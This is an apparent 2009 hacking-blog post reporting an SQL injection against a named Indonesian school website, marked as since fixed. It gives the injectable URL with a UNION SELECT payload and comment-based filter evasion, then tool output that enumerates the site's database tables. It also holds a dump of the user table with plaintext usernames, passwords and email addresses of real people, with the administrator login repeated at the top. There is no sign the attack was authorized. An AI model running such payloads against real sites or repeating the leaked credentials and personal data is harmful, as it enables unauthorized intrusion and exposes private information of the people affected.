viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Sunday, January 11, 2009

[SQLi] http://www.smakkosayu.sch.id [FIXED]

5:15 PM Posted by viperfx07 1 comment
Update (12/01/09): fixed by admin. Good admin :)



Admin page: http://www.smakkosayu.sch.id
Admin usr/pwd: administrator:h1r0sh1m4
Tool: schemafuzz v5.0 mod by me

[+] URL:http://www.smakkosayu.sch.id/page.php?s=7&pageid=157/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 16:56:09
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t41085_cmsdb
User: t41085_cmsuser@localhost
Version: 5.0.32-Debian_7etch8


[Database]: t41085_cmsdb
[Table: Columns]
[0]tblarticles: id,title,navtitle,content,menuid,specialid,ordernumber,isdisplaynav,publishdate,expiredate,status,metaauthor,metadescription,metakeyword,createdby,createddate,updateddate,updatedby,isdeleted,iscomment,thumbnail
[1]tblbanner: id,ordernumber,createdby,createddate,imglink,title,description
[2]tblcalendar: id,date,title,description,createdby,createddate,day,month,year
[3]tblcomment: id,name,email,comment,articleid,status,isread,createddate,isdeleted,updatedby,updateddate
[4]tblcounter: counter,lastupdated
[5]tblfilelibrary: id,type,tittle,filename,ext,size,link,createdby,createddate,updatedby,updateddate,isdeleted
[6]tblhighlight: id,title,imageid,content,ishardcoded,ordernumber,isactive,createdby,createddate,updatedby,updateddate,isdeleted,imglogo,url,htitle
[7]tblhomepage: id,headerimage,headertitle,contenttitle,footer,createdby,createddate,updateddate,updatedby,content
[8]tbllatestarticles: menuid,title,desc,createdby,createddate,isactive,displayitem,ordernumber
[9]tblmenu: id,title,parentid,isactive,submenu,createdby,createddate,updatedby,updateddate,isdeleted
[10]tblmenuhighlight: id,menuid,highlightid,ordernumber,createdby,createddate
[11]tblmetatag: metaauthor,metadescription,metakeyword
[12]tblpermission: id,userid,menuid,isable,createdby,createddate
[13]tblrotateimages: id,imgid,ordernumber,createdby,createddate,imglink,title,description
[14]tblshout: id,name,email,comment,createddate,isdeleted,updatedby,updateddate,status
[15]tblsubscribelist: id,email,createddate
[16]tblsubscribesent: id,Subject,Body,createddate,createdby,lastsenddate
[17]tbluser: id,login,password,name,email,lastlogin,createdby,createddate,updatedby,updateddate,isdeleted

[-] [16:58:50]
[-] Total URL Requests 159
[-] Done


[+] URL:http://www.smakkosayu.sch.id/page.php?s=7&pageid=157/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 16:59:55
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t41085_cmsdb
User: t41085_cmsuser@localhost
Version: 5.0.32-Debian_7etch8
[+] Dumping data from database "t41085_cmsdb" Table "tbluser"
[+] Column(s) ['login', 'password', 'email']
[+] Number of Rows: 6

[0] administrator:h1r0sh1m4:webmaster@hypersyssoftware.com:
[1] tfinnysia:123456:franchette@hypersyssoftware.com:
[2] jimmy:jimmy:jimmy@hs:
[3] webmaster:kosayu2007:webmaster@smakkosayu.sch.id:
[4] user1:1234:user1:
[5] user2:1234:user2@yahoo.co:user2@yahoo.co:

[-] [17:00:06]
[-] Total URL Requests 8
[-] Done

1 comment:

  1. WHAT A MOD
    darkc0de to sqli = mod :)

    ReplyDelete